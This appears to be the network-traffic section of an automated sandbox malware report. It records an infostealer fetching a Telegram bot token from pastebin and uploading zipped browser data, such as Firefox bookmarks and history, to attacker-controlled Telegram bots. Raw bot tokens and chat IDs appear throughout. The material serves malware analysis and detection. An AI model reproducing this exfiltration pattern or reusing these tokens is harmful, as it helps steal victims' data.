                                                                                                                                                                                                                                Content-Length: 137
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC137INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 35 22 7d
                                                                                                                                                                                                                                Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 915"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.2.449894149.154.167.220443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC171OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:45 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 297
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC297INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 33 32 35 2c 22 74 65 78 74 22
                                                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":26316,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265325,"text"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                43192.168.2.449895172.67.19.244435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC74OUTGET /raw/7B75u64B HTTP/1.1
                                                                                                                                                                                                                                Host: pastebin.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:45 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                cache-control: public, max-age=1801
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 1487
                                                                                                                                                                                                                                Last-Modified: Sat, 06 Jul 2024 11:03:58 GMT
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40cc2cd3c439-EWR
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC52INData Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
                                                                                                                                                                                                                                2024-07-06 11:28:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                44192.168.2.449898149.154.167.2204435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC254OUTPOST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary="5b073ce5-982c-4d6f-86c1-5eb9016cb213"
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 142488
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC40OUTData Raw: 2d 2d 35 62 30 37 33 63 65 35 2d 39 38 32 63 2d 34 64 36 66 2d 38 36 63 31 2d 35 65 62 39 30 31 36 63 62 32 31 33 0d 0a
                                                                                                                                                                                                                                Data Ascii: --5b073ce5-982c-4d6f-86c1-5eb9016cb213
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d
                                                                                                                                                                                                                                Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C3f9e073e7640535ca31a09fed4e39f55%5Cuser%40134349_en-
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 05 51 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                                                                                                                                                                                Data Ascii: PKQXBrowsers\Edge\PKo;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKo;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44
                                                                                                                                                                                                                                Data Ascii: k0_g=Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;PKQ@D
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49
                                                                                                                                                                                                                                Data Ascii: fn=*Smxh*|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4Grabber\DRI
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49
                                                                                                                                                                                                                                Data Ascii: uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRI
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc f3 72 0f 31 57 f0 87 6a 2f 48 20 2c
                                                                                                                                                                                                                                Data Ascii: |6,?.zgmo&x?e?>h@v.Hn|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_r1Wj/H ,
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 8a 13 e6 9b b8 2c 8b 2c e2 69 30 3b
                                                                                                                                                                                                                                Data Ascii: ;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK*)Ki>YlB.5+5hnciF!&|fFtv[O(*xeUPQdkCARB"u!v{kMj|f7}Q]U,,i0;
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 95 de 41 aa d2 7b ef 25 39 3b 09 f8 fa fe be 6f 9c 73 ef 1d f7 9e f3 cf 1d 83 30 b2 b3 77 d6 da d9 6b cd 39 9f 39 d7 5c f3 d9 25 f8 bc a8 eb a8 06 b9 fd 33 ff fd 96 4e 10 b5 3e ae 8a d0 a1 96 57 2a 32 d5 7b 1c 19 58 b6 5c 4a fb 74 bd d0 2c 9e d7 05 1f 5a 47 43 49 fb d5 e4 3e 5e 41 d6 8c fe ce 68 74 a5 8a 1e 6e 64 60 86 fa 7b bd a6 9c c5 cb 10 a6 9a a7 65 fe 1d 5a 24 7c a3 b8 22 9e 56 0a df cb 71 47 a4 a2 5b a5 2a 2b 19 f9 7e 7c f2 ec 5f f3 6f d7 fe d2 67 6d f4 fd 5b 8f 79 fb f4 86 2c 3e 8c ce 06 07 32 1d fa b5 e6 5d ce 4b be 67 34 f8 c9 72 15 dc bb 88 94 e2 03 8f c2 12 6f ef 60 af d2 f6 7b ac 4a 5b 2e 22 26 f0 94 2a c0 11 b0 64 3d de fd 84 02 d5 d6 20 1b 0b ab 21 28 d0 4d 01 14 28 9f f1 a0 d4 7c b5 06 39 9b 87 02 c1 4b 93 26 55 0e 2e 64 9d d8 31 b4 7f 14
                                                                                                                                                                                                                                Data Ascii: A{%9;os0wk99\%3N>W*2{X\Jt,ZGCI>^Ahtnd`{eZ$|"VqG[*+~|_ogm[y,>2]Kg4ro`{J[."&*d= !(M(|9K&U.d1
                                                                                                                                                                                                                                2024-07-06 11:28:47 UTC16355OUTData Raw: ba bd f6 fc 64 5c d8 2e de 79 60 3c e5 4d 95 d1 61 cf c4 dc 1e 7d 02 d8 6d 65 e6 2b e2 5c 8d 9d 2d ad d5 84 55 e8 ec 4f c7 32 08 ab 87 51 31 81 12 d2 ea 49 63 93 b8 cd 14 3b 8f 6b 93 88 65 cd b0 ad c9 86 61 02 dd 96 55 e1 44 7b 6e 5b 2c 31 a3 7c 59 18 28 d4 f4 92 24 32 37 24 95 ec 47 87 e4 58 fb ed a5 4d e4 bb e1 22 64 4d fe eb 0c 35 43 85 ec 6f 05 df 7e 79 de a2 0a ad 16 64 cf 1d 9f d5 83 0f 16 b7 f0 e0 b2 3d 82 c9 de 5a ee 54 7d 72 80 a3 1e cd 1c 62 b9 48 49 33 53 7f 58 ba 39 66 65 d7 79 fd 04 ae db 44 52 c4 65 c2 f2 88 d2 e4 d2 cb 5c 71 0b fe 70 a9 70 b9 61 7b 8b 11 3d 6f 83 9a 02 6e 49 44 b7 65 54 7c 69 94 7b b5 ae 5a c4 f0 ae 5c 5b 9a 40 d0 10 87 c3 16 3f 48 0a 57 12 cf 8e fa 86 6f a2 16 bd 2f a3 05 4d 59 46 ba 7e fb cb ae 2f ab 02 6b a5 d5 c5 fc ac
                                                                                                                                                                                                                                Data Ascii: d\.y`<Ma}me+\-UO2Q1Ic;keaUD{n[,1|Y($27$GXM"dM5Co~yd=ZT}rbHI3SX9feyDRe\qppa{=onIDeT|i{Z\[@?HWo/MYF~/k
                                                                                                                                                                                                                                2024-07-06 11:28:47 UTC405INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:47 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 58
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.2.449899149.154.167.220443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC254OUTPOST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary="2ac1b142-5e04-41ec-aec2-aa44ac23098b"
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 137522
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC40OUTData Raw: 2d 2d 32 61 63 31 62 31 34 32 2d 35 65 30 34 2d 34 31 65 63 2d 61 65 63 32 2d 61 61 34 34 61 63 32 33 30 39 38 62 0d 0a
                                                                                                                                                                                                                                Data Ascii: --2ac1b142-5e04-41ec-aec2-aa44ac23098b
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d
                                                                                                                                                                                                                                Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9fcfff727395b8d6c60ddb8e64f4c35a%5Cuser%40134349_en-
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 4f 47 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                                                                                                                                                                                Data Ascii: PKOGXBrowsers\Edge\PKq;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKq;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 39 6a e3 ea 08 11 66 35 c1 fa 65 4b 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50
                                                                                                                                                                                                                                Data Ascii: 9jf5eKk0_g=Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;P
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: c1 2b d3 be ce 64 71 56 ee 17 37 ec 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00
                                                                                                                                                                                                                                Data Ascii: +dqV7fn=*Smxh*|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4
